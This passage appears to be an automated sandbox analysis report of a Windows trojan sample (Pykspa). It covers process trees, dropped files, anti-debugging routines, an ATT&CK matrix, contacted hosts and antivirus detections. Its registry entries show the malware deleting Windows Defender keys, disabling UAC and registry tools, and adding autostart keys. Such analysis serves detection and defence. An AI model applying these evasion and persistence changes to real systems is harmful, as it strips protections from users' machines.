Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeAPI call chain: ExitProcess graph end nodegraph_4-29633
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\ojtoccrezqmarmjwql.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeDebugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleepgraph_4-30947
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0040A949 InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetLastError,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_0040A949
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00410BF4 lstrcpyA,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,Sleep,GetProcessHeap,RtlAllocateHeap,2_2_00410BF4
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value deleted: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows DefenderJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe*"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess created: C:\Users\user\AppData\Local\Temp\zjisvko.exe "C:\Users\user\AppData\Local\Temp\zjisvko.exe" "-C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess created: C:\Users\user\AppData\Local\Temp\zjisvko.exe "C:\Users\user\AppData\Local\Temp\zjisvko.exe" "-C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe"Jump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\windows\ojtoccrezqmarmjwql.exe*."Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\appdata\local\temp\bzmkbewmkeduommczxkiz.exe*."
Source: C:\Windows\mjvsikbqngeunkjyurda.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\windows\mjvsikbqngeunkjyurda.exe*."
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\appdata\local\temp\mjvsikbqngeunkjyurda.exe*."
Source: C:\Windows\yrzsecpaticodwrc.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\windows\yrzsecpaticodwrc.exe*."
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00413E36 lstrlenA,GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetLastError,GetLastError,lstrcpyA,GetTokenInformation,GetLengthSid,InitializeAcl,AddAccessAllowedAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,SetSecurityDescriptorSacl,lstrlenA,CreateDirectoryA,GetLastError,CloseHandle,SetFileAttributesA,2_2_00413E36
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0040C34F GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,AllocateAndInitializeSid,EqualSid,FreeSid,2_2_0040C34F
Source: zjisvko.exe, 00000004.00000002.208995373220.0000000002C9D000.00000004.00000010.00020000.00000000.sdmp, zjisvko.exe, 00000004.00000002.208996413779.000000000365E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
Source: takyouhoymc.exe, takyouhoymc.exe, 00000013.00000000.208452330828.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000013.00000002.208453009696.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000015.00000000.208467251273.000000000042A000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Shell_TrayWnd
Source: zjisvko.exe, 00000004.00000002.208995373220.0000000002C9D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager Chromelication
Source: takyouhoymc.exe, 00000002.00000003.207821321275.0000000000636000.00000004.00000020.00020000.00000000.sdmp, takyouhoymc.exe, 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000002.00000000.207767291424.000000000042A000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: pset=i=l=Windows NTUser-Agent:GET TLSServicesActivesfc_os.dllSeShutdownPrivilegeNtShutdownSystemntdll.dll%d.%d.%d.%dNotification ArToolbarWindow32NotifyIconOverflowWShell_TrayWndhttp:TwitterUser Account ControlRegistry EdiPlease restart your computer.Shutdown.regdeviceInternetGatewayDeviceWANIPConnectionserviceWANPPPConnectionurn:schemas-upnp-org:://</%s><%s>Content-Length:errorCodecontrolURL</service><serviceType>%s</serviceType>%s%s:%s:%dhttp://%s/URLBasemodelNamefriendlyNameGET %s HTTP/1.1
Source: zjisvko.exe, 00000004.00000002.208996413779.000000000365E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: @Program Manager
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: GetLocaleInfoA,2_2_00427227
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: GetLocaleInfoA,4_2_00427227
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: GetLocaleInfoA,5_2_00427227
Source: C:\Windows\ojtoccrezqmarmjwql.exeCode function: GetLocaleInfoA,6_2_0040773D
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: GetLocaleInfoA,19_2_00427227
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00413AAC GetTickCount,GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,CreateFileA,SetFileTime,CloseHandle,2_2_00413AAC
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00408912 Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,lstrlenA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,GetUserNameA,wsprintfA,ShellExecuteA,wsprintfA,ShellExecuteA,Sleep,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,LoadLibraryA,EnumResourceNamesA,FreeLibrary,MoveFileA,SetFileAttributesA,FindNextFileA,FindClose,2_2_00408912
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_004034C1 GetTickCount,lstrcmpA,lstrcmpA,lstrlenA,lstrcmpA,lstrlenA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,GetTickCount,lstrcmpA,lstrcmpA,GetTickCount,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,GetTimeZoneInformation,lstrcmpA,GetTimeZoneInformation,2_2_004034C1
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00422B93 EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,2_2_00422B93

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefendJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\WinDefendJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created: PromptOnSecureDesktop 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableRegistryToolsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\Security CenterJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_004121EB htons,socket,closesocket,bind,listen,ioctlsocket,select,__WSAFDIsSet,accept,getpeername,GetTickCount,shutdown,closesocket,recv,shutdown,closesocket,send,CreateThread,lstrlenA,closesocket,2_2_004121EB
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_004121EB GetTickCount,Sleep,htons,socket,closesocket,bind,listen,ioctlsocket,select,__WSAFDIsSet,accept,getpeername,GetTickCount,shutdown,closesocket,recv,shutdown,closesocket,send,CreateThread,lstrlenA,closesocket,4_2_004121EB
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_004121EB htons,socket,closesocket,bind,listen,ioctlsocket,select,__WSAFDIsSet,accept,getpeername,GetTickCount,shutdown,closesocket,recv,shutdown,closesocket,send,CreateThread,lstrlenA,closesocket,5_2_004121EB
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure21
Replication Through Removable Media
24
Native API
1
DLL Side-Loading
1
DLL Side-Loading
6
Disable or Modify Tools
11
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
4
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution
1
Windows Service
2
Bypass User Account Control
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Peripheral Device Discovery
Remote Desktop Protocol1
Screen Capture
1
Encrypted Channel
Exfiltration Over Bluetooth2
Inhibit System Recovery
Email AddressesDNS ServerDomain AccountsAt31
Registry Run Keys / Startup Folder
1
Access Token Manipulation
2
Obfuscated Files or Information
Security Account Manager1
Account Discovery
SMB/Windows Admin Shares11
Input Capture
1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Windows Service
1
DLL Side-Loading
NTDS4
File and Directory Discovery
Distributed Component Object Model3
Clipboard Data
3
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
2
Bypass User Account Control
LSA Secrets124
System Information Discovery
SSHKeylogging13
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts31
Registry Run Keys / Startup Folder
132
Masquerading
Cached Domain Credentials1
Network Share Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
Virtualization/Sandbox Evasion
DCSync331
Security Software Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation
Proc Filesystem121
Virtualization/Sandbox Evasion
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection
/etc/passwd and /etc/shadow3
Process Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Hidden Files and Directories
Network Sniffing1
Application Window Discovery
Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
System Owner/User Discovery
Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging2
System Network Configuration Discovery
Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534090 Sample: HqvlYZC7Gf Startdate: 15/10/2024 Architecture: WINDOWS Score: 100 63 zszagqbuxtu.org 2->63 65 zryswp.net 2->65 67 486 other IPs or domains 2->67 75 Suricata IDS alerts for network traffic 2->75 77 Antivirus detection for dropped file 2->77 79 Antivirus / Scanner detection for submitted sample 2->79 81 9 other signatures 2->81 8 HqvlYZC7Gf.exe 2 2->8         started        11 ojtoccrezqmarmjwql.exe 1 2->11         started        14 bzmkbewmkeduommczxkiz.exe 2->14         started        16 7 other processes 2->16 signatures3 process4 file5 61 C:\Users\user\AppData\...\takyouhoymc.exe, PE32 8->61 dropped 18 takyouhoymc.exe 20 25 8->18         started        22 takyouhoymc.exe 8->22         started        24 takyouhoymc.exe 8->24         started        36 16 other processes 8->36 103 Multi AV Scanner detection for dropped file 11->103 105 Found evasive API chain (may stop execution after checking mutex) 11->105 107 Found evasive API chain (may stop execution after checking computer name) 11->107 26 takyouhoymc.exe 11->26         started        109 Antivirus detection for dropped file 14->109 111 Machine Learning detection for dropped file 14->111 28 takyouhoymc.exe 14->28         started        30 takyouhoymc.exe 16->30         started        32 takyouhoymc.exe 16->32         started        34 takyouhoymc.exe 16->34         started        signatures6 process7 file8 45 C:\Windows\zvgcrsiwskhwokiwrny.exe, PE32 18->45 dropped 47 C:\Windows\yrzsecpaticodwrc.exe, PE32 18->47 dropped 49 C:\Windows\srfewatkjeewrqrigftsko.exe, PE32 18->49 dropped 51 19 other malicious files 18->51 dropped 83 Antivirus detection for dropped file 18->83 85 Found evasive API chain (may stop execution after checking mutex) 18->85 87 Creates an undocumented autostart registry key 18->87 91 9 other signatures 18->91 38 zjisvko.exe 19 18->38         started        43 zjisvko.exe 2 18->43         started        89 Creates multiple autostart registry keys 22->89 signatures9 process10 dnsIp11 69 78.63.102.38, 19742 TELIA-LIETUVALT Lithuania 38->69 71 whatismyipaddress.com 104.19.223.79, 49799, 49803, 49804 CLOUDFLARENETUS United States 38->71 73 37 other IPs or domains 38->73 53 C:\ylnagyfkxg.bat, PE32 38->53 dropped 55 C:\qhneokveviakxo.bat, PE32 38->55 dropped 57 C:\qfjygajqfqgo.bat, PE32 38->57 dropped 59 3 other malicious files 38->59 dropped 93 Antivirus detection for dropped file 38->93 95 Connects to many different private IPs via SMB (likely to spread or exploit) 38->95 97 Connects to many different private IPs (likely to spread or exploit) 38->97 101 8 other signatures 38->101 99 Creates an undocumented autostart registry key 43->99 file12 signatures13

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
HqvlYZC7Gf.exe100%AviraTR/Drop.Agent.bjxj
HqvlYZC7Gf.exe97%ReversingLabsWin32.Trojan.Pykspa
HqvlYZC7Gf.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\srfewatkjeewrqrigftsko.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\RCX70EC.tmp100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\srfewatkjeewrqrigftsko.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exe100%AviraTR/Drop.Agent.bjxj
